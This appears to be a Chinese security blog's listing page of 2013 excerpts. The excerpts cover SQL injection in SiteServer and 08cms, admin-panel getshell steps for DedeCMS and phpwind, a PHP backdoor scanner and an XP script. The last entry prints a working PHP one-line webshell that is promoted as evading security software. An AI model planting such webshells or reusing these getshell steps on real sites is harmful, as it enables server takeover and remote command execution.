Siteserver 3.6.3版SQL注入漏洞
- 2013-11-21
- Vulndb
官方最新版本3.6.4。 扫描siteserver 3.6.3版本目录结构,获得URL如下 http://www/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType...
完美扫描PHP特殊一句话后门脚本
- 2013-11-01
- 周边
作者 Spider 网上公布的各种PHP后门全军覆没 针对一些特殊变形的后门需要自己添加特征 误报率不到百分之一 代码如下保存为*.php error_reporting(E_ERROR)...
Dede后台getshell【过20130715】
- 2013-10-28
- Vulndb
测试版本为:V5.7 20130715 测试步骤: 后台——SQL命令运器——执行命令 INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset...
phpwind后台getshell
- 2013-09-10
- 周边
后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(...
08cms SQL 注入漏洞利用
- 2013-09-05
- Vulndb
来源:www.08sec.com 汽车的: /include/paygate/alipay/pays.php /* *类名:alipay_notify *功能:付款过程中服务器通知类 *详细:该页面是通知返回...
用JS给XP的右键加上“打开文件位置”
- 2013-08-24
- 周边
在WIN7中有了这个功能,并且感觉很好用,但在XP中没有这样的功能,以前都是用BAT实现的,今天扔个JS实现的: function alert( aa ) { WScript.Echo(aa);...
![河马php一句话木马[过狗版]v1.0](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2013/08/tt.png&h=320=&w=380&zc=1)
河马php一句话木马[过狗版]v1.0
- 2013-08-17
- 周边
【河马】 php一句话木马服务端和客户端【免杀版】 软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?> 写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令, 支持的函数...
